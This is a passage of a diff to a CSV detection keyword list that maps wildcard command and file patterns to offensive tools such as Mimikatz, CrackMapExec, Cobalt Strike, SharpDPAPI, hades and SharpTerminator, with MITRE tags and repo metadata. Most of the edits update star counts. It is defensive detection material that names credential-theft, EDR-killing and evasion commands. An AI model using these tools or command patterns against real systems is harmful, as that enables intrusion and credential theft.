- T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe -uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*.exe triage /password:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*.exe --ui *","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe --winlogon * *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe --wmi *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe* -d localhost * -u * -p */24*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*.exe --winlogon * *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --wmi *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe* -d localhost * -u * -p */24*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*.exe* -f *.bin -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --Filter *rule disable { condition: true }*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*.exe* -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" @@ -2355,23 +2355,23 @@ "*.exe* --technique queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique remotethread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique selfthread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" -"*.exe* -u administrator -H :*--shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*.exe* -u administrator -H :*--shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*.exe*\Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" -"*.exec*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*.exec*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*.feeds.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.files.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.forums.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ftp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.get_c2profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*.get_c2profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*.go.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.groups.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.help.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.imap.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.img.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.interactsh.com","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*.interactsh.com","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*.kb.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.kerberoast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" -"*.kirbi *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*.kirbi *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*.ldapdump.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.lists.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.live.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 